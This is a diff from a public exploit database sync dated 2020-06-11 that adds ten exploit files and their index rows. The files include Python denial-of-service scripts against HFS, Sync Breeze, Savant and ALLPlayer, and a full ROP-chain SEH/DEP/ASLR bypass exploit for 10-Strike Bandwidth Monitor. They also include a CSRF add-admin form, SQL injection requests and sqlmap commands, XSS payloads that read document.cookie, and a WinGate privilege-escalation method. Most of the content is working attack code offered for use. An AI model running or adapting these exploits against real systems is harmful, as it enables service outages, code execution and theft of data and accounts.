DB: 2020-06-11

10 changes to exploits/shellcodes

Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)
Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)
Savant Web Server 3.1 - Denial of-Service (PoC)
ALLPlayer 7.5 - Denial of-Service (PoC)
10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)
WinGate 9.4.1.5998 - Insecure Folder Permissions

HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)
Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)
Joomla J2 Store 3.3.11 - 'filter_order_Dir'  SQL Injection (Authenticated)
Virtual Airlines Manager 2.6.2 - 'id' SQL Injection

exploits/multiple/remote/48569.py

@@ -0,0 +1,192 @@
+# Exploit Title: HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)
+# Date: 2020-06-05
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.rejetto.com
+# CVE : CVE-2020-13432
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec     
+ 
+
+[Vendor]
+www.rejetto.com
+
+
+[Product]
+HFS Http File Server v2.3m Build 300
+
+
+[Vulnerability Type]
+Remote Buffer Overflow (DoS)
+
+
+[CVE Reference]
+CVE-2020-13432
+
+
+[Security Issue]
+rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual
+files or folders are used, allows remote attackers to trigger an
+invalid-pointer write access violation via concurrent HTTP requests
+with a long URI or long HTTP headers like Cookie, User-Agent etc.
+
+Remote unauthenticated attackers can send concurrent HTTP requests
+using an incrementing or specific payload range of junk characters for
+values in the URL parameters or HTTP headers sent to the server. This
+results in hfs.exe server crash from an invalid pointer write access
+violation.
+
+Requirements:
+hfs.exe must have at least one saved virtual file or folder present.
+Test using a remote IP and NOT from the same machine (localhost).
+
+Dump...
+
+(e4c.3a8): Access violation - code c0000005 (first/second chance not available)
+For analysis of this file, run !analyze -v
+WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
+eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b0000 esi=00000000 edi=00000002
+eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
+ntdll!RtlpResolveAssemblyStorageMapEntry+0x18:
+777ef8b4 53              push    ebx
+0:000> !load winext/msec
+0:000> !exploitable
+WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
+*** WARNING: Unable to verify checksum for hfs.exe
+Exploitability Classification: EXPLOITABLE
+Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0000000000000018 (Hash=0x7a29717c.0x325e6a71)
+
+PROCESS_NAME:  hfs.exe
+
+FOLLOWUP_IP: 
+hfs+8fad7
+0048fad7 8945f0          mov     dword ptr [ebp-10h],eax
+
+WRITE_ADDRESS:  000a0e08 
+
+
+[References]
+https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01
+
+
+[Exploit/POC]
+from socket import *
+import time,sys
+
+#HFS HTTP File Server v2.3m build 300.
+#Vendor: www.rejetto.com
+#Remote Remote Buffer Overflow DoS
+#Note: hfs.exe must have at least one saved virtual file or folder on the target
+#test using a remote IP and not from the same machine.
+#Discovery: hyp3rlinx
+#hyp3rlinx.altervista.org
+#ISR: ApparitionSec
+#=========================================================================
+res=""
+once=0
+cnt=0
+max_requests=1666
+
+def hfs_dos():
+    
+    global ip,port,length,res,once,cnt,max_requests
+
+    cnt+=1
+    
+    length += 1
+    payload = "A"*length
+    
+    try:
+        s=socket(AF_INET, SOCK_STREAM)
+        s.settimeout(2)
+        s.connect((ip,port)) 
+        ##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n"
+        bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n"
+        s.send(bof.encode("utf-8"))
+        if once==0:
+            once+=1
+            res = s.recv(128)
+            if res != "":
+                print("Targets up please wait...")
+                if "HFS 2.3m" not in str(res):
+                    print("[!] Non vulnerable HFS version, exiting :(")
+                    exit()
+    except Exception as e:
+        if e != None:
+            if str(e).find("timed out")!=-1:
+                if res=="":
+                    print("[!] Target is not up or behind a firewall? :(")
+                    exit()
+                else:
+                    print("[!] Done!")
+                    exit()
+    s.close()
+
+    if cnt == max_requests:
+        return False
+    return True
+
+
+def msg():
+    print("HFS HTTP File Server v2.3m build 300.")
+    print("Unauthenticated Remote Buffer Overflow (DoS - PoC)")
+    print("Virtual HFS saved file or folder required.")
+    print("Run from a different machine (IP) than the target.")
+    print("By Hyp3rlinx - ApparitionSec\n")
+
+if __name__=="__main__":
+
+    length=3
+
+    if len(sys.argv) != 3:
+        msg()
+        print("Usage: <hfs.exe Server>, <Port (usually 8080)>")
+        exit()
+
+    ip = sys.argv[1]
+    port = int(sys.argv[2])
+
+    msg()
+
+    while True:
+        if not hfs_dos():
+            print("[!] Failed, non vuln version or no virtual files exist :(")
+            break
+
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=qQ-EawfXuWY
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: May 18, 2020 
+Vendor reply: May 18, 2020
+Vendor confirm vulnerability: May 19, 2020
+Vendor creates fix: May 20, 2020
+Vendor released new version 2.4 : June 7, 2020
+June 8, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/php/webapps/48571.txt

@@ -0,0 +1,40 @@
+# Exploit Title: Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)
+# Google Dork: N/A
+# Date: 2020-06-10
+# Exploit Author: Extinction
+# Vendor Homepage: https://adikiss.net/
+# Software Link: https://adikiss.net/2014/06/aplikasi-sistem-informasi-pengumuman-kelulusan-online-2/
+# Version: latest
+# Tested on: Linux,windows,macOS
+
+# Description SpearSecurity :
+# CSRF vulnerability was discovered in Sistem kelulusan.
+# With this vulnerability, authorized users can be added to the system.
+
+POC:
+
+<html>
+<body>
+<center>
+<hr>
+<form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">
+<input type="text" class="form-control" name="nama"
+placeholder="Username" size="35">
+<br>
+<input type="text" class="form-control" name="username"
+placeholder="Spear" size="35">
+<br>
+<input type="text" class="form-control" name="pass"
+placeholder="Security" size="35">
+<br>
+<br>
+<input type="submit" name="submit" id="submit" value="Simpan Data"
+class="btn btn-primary" onclick="tb_remove()">
+</form>
+<hr>
+<h1> CODED BY SPEAR-SECURITY </h1>
+<h2> Author Extinction </h2>
+</body>
+</html>
+
+#SpearSecurity-ID

exploits/php/webapps/48572.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Joomla J2 Store 3.3.11 - 'filter_order_Dir'  SQL Injection (Authenticated)
+# Date: 2020-04-17
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Vendor Homepage: https://www.j2store.org/
+# Software Link: https://www.j2store.org/download.html
+# Reference: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html
+# Change Log: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html
+# Version: 3.3.11
+# Tested on: Kali Linux - Apache2
+--------------------------------------------------------------------------------
+Detail:
+--------------------------------------------------------------------------------
+File: administrator/components/com_j2store/models/products.php
+Vulnerable parameter: filter_order_Dir, filter_order
+
+PoC:
+Request:
+--------------------------------------------------------------------------------
+POST /joomla/administrator/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/joomla/administrator/index.php?option=com_j2store&view=products
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 312
+Connection: close
+Cookie: [COOIKE]
+Upgrade-Insecure-Requests: 1
+
+option=com_j2store&view=products&task=browse&boxchecked=0&filter_order=[SQLi]&filter_order_Dir=[SQLi]&2d42ab72d5c2716881de5d802d08ca7f=1&search=1&product_type=0&limit=20&since=&until=&productid_from=&productid_to=&pricefrom=&priceto=&sku=&manufacturer_id=&vendor_id=&taxprofile_id=&visible=&limitstart=0
+--------------------------------------------------------------------------------
+
+
+
+sqlmap -r sqli --dbs --risk=3 --level=5 --random-agent -p filter_order_Dir
+
+--------------------------------------------------------------------------------

exploits/php/webapps/48574.txt

@@ -0,0 +1,24 @@
+# Exploit Title: Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
+# Date: 2020-06-09
+# Exploit Author: Mosaaed
+# Vendor Homepage: http://virtualairlinesmanager.net/
+# Dork: N/A
+# Affected Version: 2.6.2
+# Tested on: Ubuntu
+# CVE : N/A
+ 
+-------------------
+xss
+
+http://localhost/vam/index.php?page=plane_info_public&registry_id=“><<script>alert(document.cookie);//<</script> 
+http://localhost/vam/index.php?page=fleet_public&plane_icao=1“><<script>alert(document.cookie);//<</script>
+http://localhost/vam/index.php?page=hub&hub_id=1“><<script>alert(document.cookie);//<</script>
+http://localhost/vam/index.php?page=fleet_public&plane_location=1“><<script>alert(document.cookie);//<</script>
+http://localhost/vam/index.php?page=event&event_id=1“><<script>alert(document.cookie);//<</script>
+-------------------------
+SQL Injection
+sqlmap -u "http://localhost/vam/index.php?page=manual_flight_details&ID=10" -p ID --dbs
+sqlmap -u "http://localhost/vam/index.php?page=plane_info_public&registry_id=10" -p registry_id --db
+sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_icao=1" -p plane_icao --dbs
+sqlmap -u "http://localhost/vam/index.php?page=hub&hub_id=1" -p hub_id --dbs
+sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_location=1" -p plane_location --dbs

exploits/windows/dos/38079.py

@@ -0,0 +1,26 @@
+#!/usr/bin/python
+import socket
+import sys
+from struct import pack
+
+try:
+  server = sys.argv[1]
+  port = 80
+  size = 260
+
+  httpMethod = b"GET /"
+  inputBuffer = b"\x41" * size
+  httpEndRequest = b"\r\n\r\n"
+
+  buf = httpMethod + inputBuffer +  httpEndRequest
+
+  print("Sending evil buffer...")
+  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s.connect((server, port))
+  s.send(buf)
+  s.close()
+  
+  print("Done!")
+  
+except socket.error:
+  print("Could not connect!")

exploits/windows/dos/43197.py

@@ -0,0 +1,8 @@
+#!/usr/bin/python
+
+buffer  = b"http://"
+buffer += b"\x41" * 1500
+
+f=open("player.m3u","wb")
+f.write(buffer)
+f.close()

exploits/windows/dos/43200.py

@@ -0,0 +1,33 @@
+#!/usr/bin/python
+import socket
+import sys
+
+try:
+  server = sys.argv[1]
+  port = 80
+  size = 800
+  inputBuffer = b"A" * size
+  content = b"username=" + inputBuffer + b"&password=A"
+
+  buffer = b"POST /login HTTP/1.1\r\n"
+  buffer += b"Host: " + server.encode() + b"\r\n"
+  buffer += b"User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
+  buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+  buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
+  buffer += b"Referer: http://10.11.0.22/login\r\n"
+  buffer += b"Connection: close\r\n"
+  buffer += b"Content-Type: application/x-www-form-urlencoded\r\n"
+  buffer += b"Content-Length: "+ str(len(content)).encode() + b"\r\n"
+  buffer += b"\r\n"
+  buffer += content
+
+  print("Sending evil buffer...")
+  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s.connect((server, port))
+  s.send(buffer)
+  s.close()
+  
+  print("Done!")
+  
+except socket.error:
+  print("Could not connect!")

exploits/windows/dos/44481.py

@@ -0,0 +1,31 @@
+#!/usr/bin/python
+import socket
+import sys
+from struct import pack
+
+try:
+  server = sys.argv[1]
+  port = 9121
+  size = 1000
+
+  inputBuffer = b"\x41" * size
+
+  header =  b"\x75\x19\xba\xab"
+  header += b"\x03\x00\x00\x00"
+  header += b"\x00\x40\x00\x00"
+  header += pack('<I', len(inputBuffer))
+  header += pack('<I', len(inputBuffer))
+  header += pack('<I', inputBuffer[-1])
+
+  buf = header + inputBuffer 
+
+  print("Sending evil buffer...")
+  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s.connect((server, port))
+  s.send(buf)
+  s.close()
+  
+  print("Done!")
+  
+except socket.error:
+  print("Could not connect!")

exploits/windows/local/48570.py

@@ -0,0 +1,98 @@
+# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH,DEP,ASLR)
+# Exploit Author: Bobby Cooke
+# Date: 2020-07-07
+# Vendor Site: https://www.10-strike.com/
+# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
+# Tested On: Windows 10 - Pro 1909 (x86)
+# Version: version 3.9
+# Exploit Details:
+#   1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
+#   2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
+#     - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
+#   3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
+#   4. A pointer to the LoadLibraryA symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call LoadLibraryA and find the memory address of the [kernel.dll] module; as it is protected by ASLR and will be different every time the process runs.
+#   5. A pointer to the GetProcAddress symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call GetProcAddress to find the memory address of the WinExec Symbol within [kernel32.dll].
+#   6. Use Gadgets to call the WinExec Function and open calc.
+#   - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
+# Recreate: 
+#   Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
+#   Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
+#   Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Modulename
+#   -------------------------------------------------------------------------------------------
+#   0x12000000 | 0x12057000 | False  | True    | False |  False   | False  | [ssleay32.dll]
+#   0x00400000 | 0x01247000 | False  | False   | False |  False   | False  | [BandMonitor.exe]
+#   0x11000000 | 0x11155000 | False  | True    | False |  False   | False  | [LIBEAY32.dll]
+#   -------------------------------------------------------------------------------------------
+
+import struct
+OS_retSled = '\x41'*400
+retSled    = '\x24\x01\x06\x11'*100 #11060124  # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}
+def createRopChain():
+    ropGadgets = [
+    # HMODULE LoadLibraryA( LPCSTR lpLibFileName);
+    #   $ ==>     > 1106905D  CALL to LoadLibraryA
+    #   $+4       > 012428B4  FileName = "kernel32.dll"
+        0x012126f5,  # POP EAX # RETN [BandMonitor.exe] 
+        0x110e70bc,  # kernel32!loadlibrarya [LIBEAY32.dll] 
+        0x110495ef,  # JMP [EAX] [LIBEAY32.dll]
+        0x1106905d,  # PUSH EAX # POP ESI # RETN [LIBEAY32.dll] 
+        0x012428B4,  # &String = "kernel32.dll\x00"  
+        # EAX&ESI = &kernel32.dll
+    # FARPROC GetProcAddress( HMODULE hModule, LPCSTR  lpProcName);
+    #    $ ==>    > 011D53D2  CALL to GetProcAddress
+    #    $+4      > 76C40000  hModule = (KERNEL32)
+    #    $+8      > 0014F6CC  ProcNameOrOrdinal = "WinExec"
+        0x01226010,  # PUSH ESP # AND AL, 4 # POP ECX # POP EDX # RETN [BandMonitor.exe] - [move esp -> ecx]
+        0xfffff2D4,  # EDX = Offset2String; ECX = ESP
+        0x011d53d2,  # xchg eax, ecx # ret [BandMonitor.exe] - eax=esp & ecx = "kernel32.dll\x00"
+        0x11061ea7,  # sub eax, edx # ret [LIBEAY32.dll]- eax=&String="WinExec\d4"
+        0x1106905d,  # push eax # pop esi # ret [LIBEAY32.dll] - ESI&EAX="WinExec\d4"
+        0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,  
+                     # (INC EAX # RETN)*7 [LIBEAY32.dll]
+        0x011f282b,  # xor [eax], dl # ret [BandMonitor.exe] - ESI="WinExec\x00"
+        0x01203a3b,  # xchg eax, esi # ret [BandMonitor.exe] - EAX="WinExec\x00"
+        0x11084dca,  # xchg eax, edx # ret [LIBEAY32.dll]    - EDX="WinExec\x00"
+        0x012126f5,  # POP EAX # RETN [BandMonitor.exe] 
+        0x110e708c,  # kernel32!getprocaddress [LIBEAY32.dll]
+        0x1109cdb9,  # mov eax, ds:[eax] # ret [LIBEAY32.dll] - EAX = &GetProcAddress
+        0x1106CE04,  # mov [esp+8], edx # mov [esp+4], ecx # jmp near eax
+        0x011d53d2,  # xchg eax, ecx # ret [BandMonitor.exe] - ECX=&KERNEL32.WinExec
+        0xffffffff,  # NOP - Overwritten by GetProcAddress Stack Setup
+        0xffffffff,  # NOP - Overwritten by GetProcAddress Stack Setup
+    # Call WinExec( CmdLine, ShowState );
+    #   CmdLine   = "calc"
+    #   ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
+        0x0106a762,  # INC ESI # RETN [BandMonitor.exe] - ESI="calc\x"
+        0x01203a3b,  # xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\xff"
+        0x1106905d,  # PUSH EAX # POP ESI # RETN [LIBEAY32.dll] - EAX&ESI="calc\xff"
+        0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a, # (INC EAX # RETN)*4 [LIBEAY32.dll]
+        0x01226014,  # POP EDX # RETN [BandMonitor.exe]
+        0xffffffff,  # dl = 0xff 
+        0x011f282b,  # xor [eax], dl # ret [BandMonitor.exe] - ESI="calc\x00"
+        0x01218952,  # NEG EDX # RETN [BandMonitor.exe] - EDX=0x01 = SW_SHOWNORMAL
+        0x01203a3b,  # xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\x00"
+        0x1102ce1f,  # xchg eax, ecx  [LIBEAY32.dll] - ECX="calc\x00" = CmdLine - EAX=&KERNEL32.WinExec
+        0x1106CE04,  # mov [esp+8], edx # mov [esp+4], ecx # jmp near eax
+        0x11060124   # retn [LIBEAY32.dll] - ROP NOP 
+    ]
+    return ''.join(struct.pack('<I', _) for _ in ropGadgets)
+ropChain = createRopChain()
+OS_nSEH    = '\x43'*(4188-len(OS_retSled+retSled+ropChain))
+nSEH       = '\x44'*4
+# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
+SEH        = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
+WinExec    = '\x57\x69\x6e\x45' # WinE
+WinExec   += '\x78\x65\x63\xd4' # xec.
+calc       = '\x63\x61\x6c\x63' #  calc
+calc      += '\xff\x42\x42\x42' #  ....
+extra      = '\x44'*2000
+buffer  = OS_retSled + retSled + ropChain + OS_nSEH + nSEH + SEH + WinExec + calc + extra
+File    = 'poc.txt'
+try:
+    payload   = buffer
+    f         = open(File, 'w')
+    f.write(payload)
+    f.close()
+    print File + " created successfully"
+except:
+    print File + ' failed to create'

exploits/windows/local/48573.txt

@@ -0,0 +1,101 @@
+# Exploit Title: WinGate 9.4.1.5998 - Insecure Folder Permissions
+# Date: 2020-06-05
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: https://www.wingate.com
+# Version: 9.4.1.5998
+# CVE: CVE-2020-13866
+
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/WINGATE-INSECURE-PERMISSIONS-LOCAL-PRIVILEGE-ESCALATION.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec     
+
+
+[Vendor]
+wingate.com
+
+
+[Product]
+WinGate v9.4.1.5998
+
+WinGate is a sophisticated integrated Internet gateway and communications server designed to meet the control,
+security and email needs of today's Internet-connected businesses.
+
+
+[Vulnerability Type]
+Insecure Permissions EoP
+
+
+[CVE Reference]
+CVE-2020-13866
+
+
+[Security Issue]
+WinGate has insecure permissions for the installation directory, which allows local
+users ability to gain privileges by replacing an executable file with a Trojan horse.
+The WinGate directory hands (F) full control to authenticated users, who can then run
+arbitrary code as SYSTEM after a WinGate restart or system reboot.
+
+
+C:\Program Files\WinGate>cacls WinGate.exe
+C:\Program Files\WinGate\WinGate.exe NT AUTHORITY\Authenticated Users:(ID)F
+                                     NT AUTHORITY\SYSTEM:(ID)F
+                                     BUILTIN\Administrators:(ID)F
+                                     BUILTIN\Users:(ID)R
+                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
+                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
+
+
+[Affected Component]
+WinGate Installation Directory
+
+[Impact Code execution]
+true
+
+[Impact Denial of Service]
+true
+
+[Impact Escalation of Privileges]
+true
+
+[Impact Information Disclosure]
+true
+
+
+[Exploit/POC]
+Logon as standard user replace WinGate.exe with a trojan executable, wait for restart or reboot the system, your code runs as SYSTEM.
+
+
+[Network Access]
+Local
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: May 10, 2020
+Vendor acknowledgement: May 10, 2020
+Vulnerability confirmed: May 18, 2020
+Request status: May 22, 2020
+No reply
+Notify vendor request CVE: May 26, 2020
+No reply
+Advised of public disclosure: June 1, 2020
+No reply
+June 4, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

files_exploits.csv

@@ -6737,6 +6737,10 @@ id,file,description,date,author,type,platform,port
 48502,exploits/windows/dos/48502.py,"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows,
 48503,exploits/windows/dos/48503.py,"Filetto 1.0 - 'FEAT' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows,
 48521,exploits/multiple/dos/48521.py,"BIND - 'TSIG' Denial of Service",2020-05-20,"Teppei Fukuda",dos,multiple,
+43200,exploits/windows/dos/43200.py,"Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)",2017-09-27,"Mr Bruce",dos,windows,
+44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows,
+38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows,
+43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11087,6 +11091,8 @@ id,file,description,date,author,type,platform,port
 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
 48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows,
 48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows,
+48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows,
+48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18167,6 +18173,7 @@ id,file,description,date,author,type,platform,port
 48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,
 48537,exploits/windows/remote/48537.py,"Microsoft Windows - 'SMBGhost' Remote Code Execution",2020-06-02,chompie1337,remote,windows,
 48540,exploits/linux/remote/48540.py,"vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-02,aaronsvk,remote,linux,
+48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42793,3 +42800,6 @@ id,file,description,date,author,type,platform,port
 48562,exploits/php/webapps/48562.txt,"Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection",2020-06-08,"Pankaj Kumar Thakur",webapps,php,
 48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php,
 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,
+48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php,
+48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir'  SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
+48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php,